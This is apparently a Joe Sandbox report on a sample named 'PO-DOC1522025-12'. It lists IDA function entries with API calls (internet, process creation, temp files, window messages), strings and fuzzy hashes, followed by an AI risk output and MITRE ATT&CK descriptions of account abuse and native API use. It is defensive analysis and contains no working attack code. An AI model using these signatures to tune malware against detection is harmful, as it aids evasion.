Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: Window$ColorCreateMessageObjectRectSendStock
String ID: static
API String ID: 1983116058-2160076837
Opcode ID: 579583ca90fb1c9dccc968f06c04f6ed08f0e3cc4c70fe6937f5eae64e466c4d
Instruction ID: 0a8c7f53e4ceb40714af694478847ac6d8098c6d7ee18f057249c2e47e2994a2
Opcode Fuzzy Hash: 579583ca90fb1c9dccc968f06c04f6ed08f0e3cc4c70fe6937f5eae64e466c4d
Instruction Fuzzy Hash: 2A113AB261060AAFDF01DFA8CC46EEA7BB8FB08354F014916F965E3250D735E851DB60

Function 001BCD1E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66networkCOMMON

Download Yara Rule

APIs

InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 001BCD7D
InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 001BCDA6

Strings

<local>, xrefs: 001BCD66

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: Internet$OpenOption
String ID: <local>
API String ID: 942729171-4266983199
Opcode ID: ae05a815d39d979dc19507aef3a3835fe3c05545b210632ede5ecdbd8f3d1944
Instruction ID: d8f93eabb95142019fd16a26bf92ec38239a1e359d82f522369b809bbd949d7d
Opcode Fuzzy Hash: ae05a815d39d979dc19507aef3a3835fe3c05545b210632ede5ecdbd8f3d1944
Instruction Fuzzy Hash: 9E11C279205632BAD7384BA6CC89FE7BEACEF527A4F40422AF14983080D7709840D6F0

Function 001D3429 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON

Download Yara Rule

APIs

GetWindowTextLengthW.USER32(00000000), ref: 001D34AB
SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 001D34BA

Strings

edit, xrefs: 001D348F

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: LengthMessageSendTextWindow
String ID: edit
API String ID: 2978978980-2167791130
Opcode ID: 6fb16ae88c82e252dc0f7657912d5097931449a780b19e77422f509b5ae61877
Instruction ID: 1f1964c8c35dc84e7e6df508088c55b38d3552c03a3f9c4bf653667300c3e960
Opcode Fuzzy Hash: 6fb16ae88c82e252dc0f7657912d5097931449a780b19e77422f509b5ae61877
Instruction Fuzzy Hash: 69118F71101108AFEF124E68EC44AEB376AEB15378F504726F971932E0C779DC91D752

Function 001A6C86 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56COMMON

Download Yara Rule

APIs

Part of subcall function 00149CB3: _wcslen.LIBCMT ref: 00149CBD

CharUpperBuffW.USER32(?,?,?), ref: 001A6CB6
_wcslen.LIBCMT ref: 001A6CC2

Strings

STOP, xrefs: 001A6CBC, 001A6CC1

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: _wcslen$BuffCharUpper
String ID: STOP
API String ID: 1256254125-2411985666
Opcode ID: 5f16354008d6872efd7b86dfcd901fcb0f94952721a01eec0c2ab7f7917717ca
Instruction ID: ac738b012c733a1938f1894a8e184de461aeac5aa144fce53687f49515b3278e
Opcode Fuzzy Hash: 5f16354008d6872efd7b86dfcd901fcb0f94952721a01eec0c2ab7f7917717ca
Instruction Fuzzy Hash: 230126366005278BCB209FFDDC808BF33B4EF727607050524E86297199EB31D900C650

Function 001A1CDE Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00149CB3: _wcslen.LIBCMT ref: 00149CBD

Part of subcall function 001A3CA7: GetClassNameW.USER32(?,?,000000FF), ref: 001A3CCA

SendMessageW.USER32(?,000001A2,000000FF,?), ref: 001A1D4C

Strings

ListBox, xrefs: 001A1D16
ComboBox, xrefs: 001A1CEB

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: ClassMessageNameSend_wcslen
String ID: ComboBox$ListBox
API String ID: 624084870-1403004172
Opcode ID: f529ef740dfbd90e51977b1c0e9108468420e0394a838e0c2387384934a1af67
Instruction ID: b1cfe0503431d914be9cd3e93c9451e1fb0bb360e159163f17a2cb7b1ab2e503
Opcode Fuzzy Hash: f529ef740dfbd90e51977b1c0e9108468420e0394a838e0c2387384934a1af67
Instruction Fuzzy Hash: 5001B579651229ABCB08EBA4DC559FF7768EB57350F040A1AB832572D2EB3059088660

Function 001A1BD8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00149CB3: _wcslen.LIBCMT ref: 00149CBD

Part of subcall function 001A3CA7: GetClassNameW.USER32(?,?,000000FF), ref: 001A3CCA

SendMessageW.USER32(?,00000180,00000000,?), ref: 001A1C46

Strings

ListBox, xrefs: 001A1C10
ComboBox, xrefs: 001A1BE5

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: ClassMessageNameSend_wcslen
String ID: ComboBox$ListBox
API String ID: 624084870-1403004172
Opcode ID: 151c33a088377871b4eb2993a540d27ddc81879659272398aac08aedec0d0ba5
Instruction ID: b3bf7d1e7e98e051b8a3d97d8da8d148f036717e3793c4cc7e78043f45ec7c27
Opcode Fuzzy Hash: 151c33a088377871b4eb2993a540d27ddc81879659272398aac08aedec0d0ba5
Instruction Fuzzy Hash: BE01A779AC121976CB08EBA0DD51AFF77A89F23350F14001AB416672D6EB209F18D6B1

Function 001A1C5C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00149CB3: _wcslen.LIBCMT ref: 00149CBD

Part of subcall function 001A3CA7: GetClassNameW.USER32(?,?,000000FF), ref: 001A3CCA

SendMessageW.USER32(?,00000182,?,00000000), ref: 001A1CC8

Strings

ListBox, xrefs: 001A1C94
ComboBox, xrefs: 001A1C69

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: ClassMessageNameSend_wcslen
String ID: ComboBox$ListBox
API String ID: 624084870-1403004172
Opcode ID: 142fca3b8cb6a71e0501406ec6a2c1259f491303b80e7ca4e9e10654f3c948ff
Instruction ID: dd82e784be399194cb3ef58569e3fe09b4cb99fd543f99689da3b8eb43771f62
Opcode Fuzzy Hash: 142fca3b8cb6a71e0501406ec6a2c1259f491303b80e7ca4e9e10654f3c948ff
Instruction Fuzzy Hash: 6F01D679A8122977CF04EBA4DE41AFF77A89B23350F540016B80277296EB209F18D6B1

Function 001A1D68 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00149CB3: _wcslen.LIBCMT ref: 00149CBD

Part of subcall function 001A3CA7: GetClassNameW.USER32(?,?,000000FF), ref: 001A3CCA

SendMessageW.USER32(?,0000018B,00000000,00000000), ref: 001A1DD3

Strings

ListBox, xrefs: 001A1DA0
ComboBox, xrefs: 001A1D75

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: ClassMessageNameSend_wcslen
String ID: ComboBox$ListBox
API String ID: 624084870-1403004172
Opcode ID: 8778ed361a7279475d9722172aea8e37e90a6c4f9f93b15522cfd8f70114077b
Instruction ID: 97fe115999870f4793239cf6e6f1c3195fb1748a057a8c9ea3247eef8b90e5b0
Opcode Fuzzy Hash: 8778ed361a7279475d9722172aea8e37e90a6c4f9f93b15522cfd8f70114077b
Instruction Fuzzy Hash: 38F02879B4122976DB08F7E4DC96FFF7778AF13350F040915B822672D2DB60590C86A0

Function 001D8172 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 40processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00213018,0021305C), ref: 001D81BF
CloseHandle.KERNEL32 ref: 001D81D1

Strings

\0!, xrefs: 001D818A

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: CloseCreateHandleProcess
String ID: \0!
API String ID: 3712363035-164112491
Opcode ID: e74e039740a4d91f20489b1c354c304c66225294e0d22c71fb63f5188a3d9d27
Instruction ID: 9df83eb801d096974f8937d6466b1690e5375bb548a1a16386e61746f3f64d2b
Opcode Fuzzy Hash: e74e039740a4d91f20489b1c354c304c66225294e0d22c71fb63f5188a3d9d27
Instruction Fuzzy Hash: 1FF05EB2641300BEE620AB65AC49FF73ADDEB2C750F004421FB08D51A2DB758B5082F8

Function 001C747E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 001C7493
_wcslen.LIBCMT ref: 001C74B9

Strings

3, 3, 16, 1, xrefs: 001C7483

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: _wcslen
String ID: 3, 3, 16, 1
API String ID: 176396367-3042988571
Opcode ID: 9219cbad763a18f53fe582cf218f58476ee704bff2619c29a94df3e727192d1f
Instruction ID: 31c8778d193ad774edceb5731ac2ba9c7f57cf9144b20c706d7cbf611cdeb6df
Opcode Fuzzy Hash: 9219cbad763a18f53fe582cf218f58476ee704bff2619c29a94df3e727192d1f
Instruction Fuzzy Hash: 27E02B0265472011A33512799CC1F7F568ADFF9750710182FF981C22E6EBD4CDA193A0

Function 001A0B15 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 28windowCOMMON

Download Yara Rule

APIs

MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 001A0B23

Strings

AutoIt, xrefs: 001A0B17
Error allocating memory., xrefs: 001A0B1C

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: Message
String ID: AutoIt$Error allocating memory.
API String ID: 2030045667-4017498283
Opcode ID: 5ee5b7a3166391831e4c7b6626a9f4d3618484d16ec46632ab4e0d14b733d67f
Instruction ID: 195a88de5975f8624879f2c016e132932459fc7a95a19e04891a9686813ee987
Opcode Fuzzy Hash: 5ee5b7a3166391831e4c7b6626a9f4d3618484d16ec46632ab4e0d14b733d67f
Instruction Fuzzy Hash: 02E0D83124531966D2143794BC03FC97B848F16B25F10082BFB58595C38BD224A086E9

Function 00160D42 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 0015F7C9: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00160D71,?,?,?,0014100A), ref: 0015F7CE

IsDebuggerPresent.KERNEL32(?,?,?,0014100A), ref: 00160D75
OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0014100A), ref: 00160D84

Strings

ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00160D7F

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString
String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
API String ID: 55579361-631824599
Opcode ID: 78630259d3aad55394a1a5f2f66189c708c4b3af4a89876acaf4adf546276de6
Instruction ID: 8b0d07bfc05fd925af3341857fdefebf93bd8972346b0c49060d384bd9a36091
Opcode Fuzzy Hash: 78630259d3aad55394a1a5f2f66189c708c4b3af4a89876acaf4adf546276de6
Instruction Fuzzy Hash: DAE06D742013018BD3219FB8E908342BBE5AB18745F018A2EE496C6B55DBB0E585CB91

Function 0015E398 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 21COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 0015E3D5

Strings

0%!, xrefs: 0015E3B5
8%!, xrefs: 0015E3CA

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: Init_thread_footer
String ID: 0%!$8%!
API String ID: 1385522511-1065198821
Opcode ID: 837148ef5c32b636cf358924d3da68580e2fa536bc2938f4ddbf88812af61c96
Instruction ID: c3f22c9e5228aa34614b65f391388ad547562bd53b1df859a7a6ad4caa45320a
Opcode Fuzzy Hash: 837148ef5c32b636cf358924d3da68580e2fa536bc2938f4ddbf88812af61c96
Instruction Fuzzy Hash: 24E02631C10910EBCA0D971CFBE8ACA33D7BB39321B904168F8228F1D1DF7029AD8644

Function 001B3017 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18COMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(00000104,?,00000001), ref: 001B302F
GetTempFileNameW.KERNEL32(?,aut,00000000,?), ref: 001B3044

Strings

aut, xrefs: 001B3038

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: Temp$FileNamePath
String ID: aut
API String ID: 3285503233-3010740371
Opcode ID: d8b45ffe04d28ffa3b87e8a504a23131f6e6b4ab44c5777c589b08136eef225f
Instruction ID: 099ac8ea2b148826340cfc260353ff582d930e8149904b942d67048d3a9c6c08
Opcode Fuzzy Hash: d8b45ffe04d28ffa3b87e8a504a23131f6e6b4ab44c5777c589b08136eef225f
Instruction Fuzzy Hash: CBD05B7150131467DB20A7949C0DFC77B7CD705750F000652B655D24D1DAB09584CAD0

Function 0019D21C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 0019D220

Strings

X64, xrefs: 0019D2A8
%.3d, xrefs: 0019D22B

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: LocalTime
String ID: %.3d$X64
API String ID: 481472006-1077770165
Opcode ID: 60798cbe7507f406b0a734a7a3379160fa831d857a87def05267856782d29101
Instruction ID: 638605dd74c88080b8afcde245ab66bbefd96b768a5aed5b859270ef346d07ff
Opcode Fuzzy Hash: 60798cbe7507f406b0a734a7a3379160fa831d857a87def05267856782d29101
Instruction Fuzzy Hash: 09D01275C09109E9CF5897D0EC458BAB37CAB18341F518452FC1691080D724D548A761

Function 001D2322 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 001D232C
PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 001D233F

Part of subcall function 001AE97B: Sleep.KERNEL32 ref: 001AE9F3

Strings

Shell_TrayWnd, xrefs: 001D2325

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: 45a3655f77d9e994e6cdcbe92510fd0d71065c1ccd3c86e273eabaf9d636ce81
Instruction ID: 1f5c3b3dfcdc74140179a91cb3c60adf7f460ca5ea7da740c5ba58013d3e8876
Opcode Fuzzy Hash: 45a3655f77d9e994e6cdcbe92510fd0d71065c1ccd3c86e273eabaf9d636ce81
Instruction Fuzzy Hash: 41D0C9363D6311B6EA64A770AC4FFC6BA589B11B14F004916B645AA1E1CAA0A851CA94

Function 001D2356 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 001D236C
PostMessageW.USER32(00000000), ref: 001D2373

Part of subcall function 001AE97B: Sleep.KERNEL32 ref: 001AE9F3

Strings

Shell_TrayWnd, xrefs: 001D2365

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: c442392a913a66af7c6099cd8c848a9489e3a1b71e291ebcf66852794659d983
Instruction ID: 494339cda6569f6227e580b88a0df4951fc2fbf3fb72253d93059f796da22e0a
Opcode Fuzzy Hash: c442392a913a66af7c6099cd8c848a9489e3a1b71e291ebcf66852794659d983
Instruction Fuzzy Hash: 9FD0C9363D23117AEA64A770AC4FFC6B6589B15B14F004916B645AA1E1CAA0A851CA94

Function 0017BDFD Relevance: 5.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,?,?,00000000,?,?,?,?,?,00000000,?), ref: 0017BE93
GetLastError.KERNEL32 ref: 0017BEA1
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0017BEFC

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: ByteCharMultiWide$ErrorLast
String ID:
API String ID: 1717984340-0
Opcode ID: 303318cdbe2b66eec5155b8228fe0044c01345c334aa273f5cea6e0204a6ec36
Instruction ID: 2a964ca765100fa3481da81c94e315e0c6f2429af5da7a98ae48f07d58b389e9
Opcode Fuzzy Hash: 303318cdbe2b66eec5155b8228fe0044c01345c334aa273f5cea6e0204a6ec36
Instruction Fuzzy Hash: 9241F535609216AFCF258F64CCD4BBA7BB4EF45B20F25816AF95D972A1DB308C01CB60

Input	Output
URL: email Model: Joe Sandbox AI	{ "risk_score": 1, "reasoning": [ "No headers provided to analyze", "Cannot make security assessment without header information", "Default to low risk score due to lack of evidence" ] }
Date: unknown

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

